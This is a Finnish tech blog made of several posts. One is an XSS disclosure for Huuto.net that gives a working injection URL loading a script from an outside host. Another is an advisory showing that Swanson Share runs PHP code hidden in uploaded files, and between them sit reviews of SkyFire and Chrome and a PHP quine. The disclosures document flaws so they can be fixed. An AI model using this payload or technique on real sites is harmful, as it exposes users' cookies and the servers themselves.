Suoranaista välitöntä vaaraa haavoittuvuudesta ei ole, koska Huuto.net fiksusti vaatii tarjouksia tehdessä ja käyttäjän tietoja muokatessa aina salasanan, mutta esimerkiksi käyttäjän osoite- ja muiden muuten salaisten yhteystietojen selaus onnistuu käyttäjän salasanaa tuntematta

Haavoittuvuus on tiedostossa /fi/showfeedback.php3, joka listaa pyydetyn käyttäjän saaman huutokauppapalautteen. Haluttu käyttäjä lähetetään skriptille GET muuttujassa fbuser. Muuttujalle ei ilmeisesti tehdä minkäänlaista suodatusta, lukuunottamatta (oman veikkaukseni mukaan automaattista) PHP:n addslashes:ia. Käytännössä addslashes estää lainausmerkkien käyttämisen XSS-urlissa, mutta tämä ei muodosta kovinkaan suurta ongelmaa, koska hyökkääjän täytyy ainoastaan saada sivu linkkaamaan ulkoiseen javascript-tiedostoon.
Käytännössä tämä onnistuu käyttämällä osin rikkinäistä HTML:ää, ja asettamalla fbuser-muuttujana vaikkapa ‘<script src=http://domain.com/script.js></script>’. Tämä on kuitenkin tarpeettoman pitkä tapa, ja optimointiin on vielä varaa. Ensinnäkin, script-tagin sulkutag on täysin turha, samoin kuin itse tagin lopettava suurempikuin-merkki. Suurimassa osassa moderneista selaimista, selain käsittelee Quirks Modessa ‘<script src=osoite’-muotoisen script-tagin onnistuneesti.

Nyt XSS on siis muotoa ‘fbuser=<script src=http://domain.com/script.js’. protokolla-merkinnästä voidaan tuoreilla selaimilla jättää itse protokollan nimi ja kaksoispiste pois, ja tagi toimii edelleen normaalisti (Quirks Modessa).
Nyt siis URL on muotoa ‘huuto.net/fi/showfeedback.php3?fbuser=<script src=//domain.com/script.js’.

Proof-of-concept löytyy osoitteesta http://xi7.org/t.js. Käytännössä koodia käytettäisiin seuraavasti: http://www.huuto.net/fi/showfeedback.php3?fbuser=%3Cscript%20src=//xi7.org/t.js. Koodi ei varasta käyttäjien evästeitä, ainoastaan tulostaa ne, ja lyhyen selostuksen haavoittuvuudesta.

Itse selain on uskomaton. Olen käyttänyt PocketIE:tä jo aika päivät sitten kyllästymiseen asti, joten olen sen jälkeen testannut yhtä jos toistakin selainta WM-kännykälleni. Opera Mobile on toimintorikas, mutta järkyttävän hidas. Opera Mini taas on sutjakka mutta liiankin riisuttu. MiniMo/Fennec on kehityksessään vielä aivan lapsenkengissä (mm. siten, että tästä mobiiliselaimesta on tähänmennessä julkaistu versiot Nokian webbitabletille, Windowsille ja OSX:lle). NetFront taas maksaa maltaita, kosketusnäytöttömien laitteiden versio on melko köyhä verrattuna “kunnon” versioon, ja tuotetuki on Japanin ulkopuolella säälittävää.
Kaikilla selaimilla on iso liuta ongelmia. Joko ne ovat hitaita, tai niillä ei ole tukea juuri millekkään muulle kuin perus XHTML:lle. SkyFire on nopea(hko, mutta tämä lähinnä siksi että palvelu on virallisesti vain jenkkilän väelle), tukee mm. Flashiä niin hyvin, että esimerkiksi YouTube-videot pyörivät suoraan, ilman kikkailuja ja käyttöliittymä on selkeä ja yksinkertainen.

Ohjelma pitää käytössä ollessaan jatkuvaa palvelinyhteyttä erikoiseen välityspalvelimeen, joka hoitaa suurimman osan sivujen zoomauksesta ja renderöimisestä. Zoomaus on oikeasti älykäs, ja valitsee eri suurennusasteita tarkasteltavan sivunosan koon mukaan. Itse selailu tapahtuu kosketusnäytöttömissä laitteissa virtuaalikursorilla, ja kosketusnäytöllisillä laitteilla, no, koskettamalla. Asetuksia on erittäin vähän, mutta ohjelma ei juuri säätämistä kaipaa. Kaikki toiminnot ovat tarpeeksi yksinkertaisia, ettei niitä tarvitse sen suuremmin muokata, ja tärkein asetus selaimessa onkin äänten vaimennus.

SkyFire todella tuo PC:n webin kännykkään, niinkuin mainoksessa luvataan. Selaimessa on desktopilta tuttu automaattitäydennys osoite/haku-palkissa, sivut näytettään kokonaisuudessaan, ilman ihmeellisiä kappalekavennuksia tai muita kikkoja, ja asiat joiden odottaisi toimivan PC:n selaimessa (AJAX, Flash, Youtube) toimivat SkyFiressäkin.
SkyFire on kuitenkin mobiili-selain, ja vinkkaa käyttäjälle, jos selatusta sivusta löytyy mobiilioptimoitu versio. Windowssin mediaformaatteja käyttävien videoiden kohdalla selain myös mahdollistaa koko videon avaamisen erikseen MediaPlayeriin, jolloin video on helpompi katsoa koko ruudulta.

Tällä hetkellä on vielä vaikea sanoa mitään varmaa SkyFirestä. Selain on melko nopea, mutta ajoittain on tuskastuttavia hidasteluita. Nämä saattavat tosin täysin johtua siitä, että ainut käytettävissä oleva SkyFire välityspalvelin on tällä hetkellä USA:ssa, ja ongelma saattaa korjautua täysin jos/kun Skyfire Labs laajentaa tuotteensa saatavuuden virallisesti Eurooppaan asti. Toinen pullonkaula voi olla WM6.1-laitteeksi melko hidas HTC S710:ni. Sitä ei ole suunniteltu ajamaan uusinta Windows Mobilea, joten jo pelkät taustaprosessit saattavat hidastaa puhelinta siinä määrin, että suoritintehoa kaipaava selain saattaa kärsiä.
Suosittelen kaikkia kynnelle kykeneviä ainakin testaamaan SkyFireä, koska selain on jotain aivan uutta, ainakin minulle. Jo mahdollisuus katsella flashvideoita suoraan mobiiliselaimesta on mielestäni rekisteröinnin vaivan arvoinen. Selaimesta on WindowsMobile-version lisäksi saatavilla versio Nokian N- ja E-sarjan puhelimille (ja muille mahdollisille S60 3rd edition laitteille), jonka pitäisi sisältää kaikki samat ominaisuudet kuin WM-versionkin.
Betaan voi rekisteröityä täällä ja lisää tietoa SkyFirestä löytyy tuotesivulta.

Selain todella on nopea. Välilehdet aukeavat erittäin sutjakkaasti ja itse selainkin käynnistyy todella vauhdikkaasti. Toisaalta vertailukohta on huono, koska omassa Firefoxissani on melkoinen liuta laajennuksia, joten sen käynnistymisajat eivät varmasti ole optimaalit.
Toinen asia joka Chromessa heti pistää silmään on käyttöliittymän koruton siisteys. Selaimessa ei ole lainkaan perinteistä tekstivalikkoa, vaan ainoat kaksi valikkoa löytyvät painikkeista “osoite”kentänt oikealta puolelta. Tämä tuleekin olemaan asia josta vannoutuneet IE, Opera ja Safari-fanipojat varmasti tulevat kitisemään.. Omaan makuun systeemi sopii oikein hyvin. Kiitettävästi ei ole tarvinnut valikkoja juurikaan rassata; pikanäppäimet ovat vanhat tutut, ja muun käyttöliittymän kuvakieli on selkeää ja loogista.

Mainitsinkin jo “osoite”kentän. Kyseessä on Firefox 3:stakin tuttu “awesomebar”, PCP-höyryissä. Kun palkkiin alkaa näppäimistöllä jotain naputtelemaan, pomppaa listan alkuun ehdotuksiksi kirjanmerkkien ja sivuhistorian sivujen lisäksi googlen I’m feeling lucky-vastaus ja linkki oletushakukoneen hakutuloksiin kirjoitetusta tekstistä.
Hyvä kun oletushakukone tuli puheeksi. Yllättäen tehdasasetuksena hakukone on Google, mutta Chrome tarjoutuu heti ensimmäiseksi asennuksen jälkeen vaihtamaan käyttäjän suosikkihakukoneen selaimen-käyttöön. Melkein saman tekee toki IE:kin, mutta Google on pitänyt huolta siitä, ettei selain liiaksi turputa julkaisijansa hakukonetta

Selaimeen on luonnollisesti sisäänrakennettu Googlen Gears, ja nopeiden testien perusteella WordPressissä ja Remember The Milkissä, selain äityy vielä entistä “vastaavammaksi” (mikä on oikea käännös lontoon “responsiveness”-sanalle?), tai siis.. parantaa vasteaikojaan :D

Myös konepellin alla on mukavia ominaisuuksia:

• WebKit sivunmuodostusmoottori. Selain läpäisee ACID2-testin täydellisesti ja on äärimmäisen nopea piirtämään sivuja
• Tabikohtaiset prosessit. Jokainen välilehti suoritetaan omassa prosessissaan, joten jos sattuu eksymään ikävälle hyökkäyssivulle, tai JavaScript-ohjelmaa testatessa tekee hieman isomman mokan, ei koko selain (teoriassa) kuopsahda nurin, ainoastaan kyseinen välilehti. Järjestelmä toimi omissa testauksissa, mutta vaikea tietysti näin lyhyellä käytöllä sanoa mitään varmaa
• Incognito-tila. Suoraan ohjelman tiedosto-valikosta löytyy toiminto joka avaa uuden, selkeästi merkityn, ikkunan ns. Incognito-tilasssa, jossa selain ei tallenna mitään tietoa selailusta tietokoneelle. Sivuhistoria, syötetyt lomaketiedot ja salasanat poistetaan kun ikkuna suljetaan. Tämä on erittäin kätevää, koska näin ei tarvitse poistaa hyödyllisä tallennettuja lomaketietoja, vain koska tahtoo piilottaa selaimen hakuhistoriasta vaimon lahjayllätyksen :D
• Googlen mukaan, selain sisältää aivan uusia JavaScript-systeemejä, jotka tulevaisuudessa voivat avata aivan uusia mahdollisuuksia verkkoohjelmistokehittäjille. Vaikka tämä onkin itselleni koko selaimen kiinnostavin ominaisuus (en voi ainakaan vielä ottaa Chromea oletusselaimekseni, siitä myöhemmin), mutten ole ehtinyt asiaan vielä tarkemmin perehtyä. Saatan kirjoitella aiheesta lisää jos näin teen.

Kaikenkaikkiaan selain on ensimmäiseksi julkiseksi versioksi ERINOMAINEN, ja odotan innolla mitä tulevaisuus tuo Chromelle. En kuitenkaan ainakaan vielä voisi siirtyä Firefoxista Chromeen, vaikka Googlen selain erittäin siististi kopioikin kaiken tarvittavan ongelmitta sisäänsä (tallennetut salasanat, kirjanmerkit ym.). Käytän melko suurta määrää laajennuksia Firefoxissa, ja vaikka voisinkin ns. “hätätilanteessa” elää ilman niitä, jos saan valita: en tahdo.
Googlella on kuitenkin suuria suunnitelmia Chromen suhteen, ja jos siihenkin saadaan joustava laajennustuki, voisin hyvinkin vaihtaa uuteen selaimeen.

Suosittelen kaikkia Windows-käyttäjiä ainakin kokeilemaan Chromea. Selain on hurjan vauhdikas, helppokäyttöinen ja selkeä, ja jos siirtyy esimerkiksi IE:n puolelta, ei pienen totuttelun jälkeen jää varmasti kaipaamaan mitään. Firefoxin ja Operan käyttäjät huomaavat varmasti puuttuvia ominaisuuksia, mutta haluan uskoa että tähänkin on tulossa vielä parannusta. Katsotaan mitä Google saa aikaiseksi selainmarkkinoilla. Kovin huonosti se ei ole oikein millään alalla vielä pärjännyt :P

Tosi simppeli tapa huijata muka-quine on vain 21 tavua:
<?=$q[0]=file(__FILE__);

Pätkä ei kuitenkaan ole oikea quine, koska se lukee lähdekoodin levyltä, eikä aito quine saa moista tehdä, eikä myöstään hankkia lähdekoodia jollain ohjelmointikielen erikoisfunktiolla, vaan sen tulisi muodostaa tulostettava koodi omin päin.

Oma koodini on lyhyin php quine jonka muutamankymmenen minuutin webbihaeskelulla löysin. Se on 41 tavua lyhyempi kuin tämä, jota monella sivustolla tituleerattiin lyhyimmäksi. En oikein usko että olisin ensimmäinen joka tämän tavan olisi keksinyt, eikä tässä ratkaisutavassa juurikaan ole muutosmahdollisuuksia, lukuunottamatta muuttujan nimeä. En kuitenkaan netistä moista mistään löytynyt, mutta jos joku muu tietää mistä vastaava ratkaisu, tai vielä lyhyempi php quine löytyisi, niin arvostaisin jos tämä sielu voisi jättää linkin kommenttina.

Mutta nyt itse pääesiintyjä:
<?printf($q='<?printf($q=%c%s%1$c,39,$q);',39,$q);
50 tavua, testattu toimivaksi PHP 5:ssä.

Julkaisijan web-sivustolta:

Swanson Share is a file hoster that allows you to upload a file
that can only be downloaded once before it is deleted.
All downloads are secured, so you can use Swanson Share to distribute digital downloads.

Ongelma

Skripti ei todellakaan suojaa ladattuja tiedostoja, melkeinpä päinvastoin. Kaikki tiedostot tallennetaan julkiseen alikansioon ja tiedostonimen eteen lisätään muutama satunnainen numero, eli puhuroidun (hihihihihi) tiedoston voi suorittaa navigoimalla tähän kansioon ja valitsemalla halutun tiedoston.
Mikä vielä pahempaa, kun tallennettu tiedosto ladataan palvelimelta, skripti käyttää php:n include()-functiota tiedoston sisällön syöttämiseksi selaimelle, joten kaikki ladattavan tiedoston sisältämä php-koodi suoritetaan!

Hyökkääjä voisi yksinkertaisesti lisätä esimerkiksi gif-kuvatiedoston loppuun php-koodin, joka pudottaa etähallintatyökalun johonkin kansioon, joka on korkeammalla tiedostopuussa. Koodin voisi tämän jälkeen suorittaa lataamalla tiedoston. Näin skripti on haavoittuvainen, vaikka ylläpitäjä olisi muokannut skriptin estämään php-tiedostojen tallennuksen, ja evännyt selaimilta pääsyn säilökansioon, koska scripti tästä huolimatta sisällyttää ladattavan tiedoston latauksen yhteydessä

Ratkaisu

Tällä hetkellä ei ole olemassa virallista päivitystä tai ratkaisua Swanson Web Medialta. Olen ottanut kehittäjään yhteyttä useampaan otteeseen, mutten ole saanut vastausta.
Pahinta koko asiassa on, että kyseessä on melkein viidenkymmenen dollarin arvoinen skripti, eikä mikään “ilmais-kilke”.

Kotikutoinen ratkaisu olisi estää php:n suoritus säilökansiossa ja muokata skriptiä uudelleenohjaamaan selaimen ladattavaan tiedostoon, sen sisällyttämisen sijaan.

English version of this advisory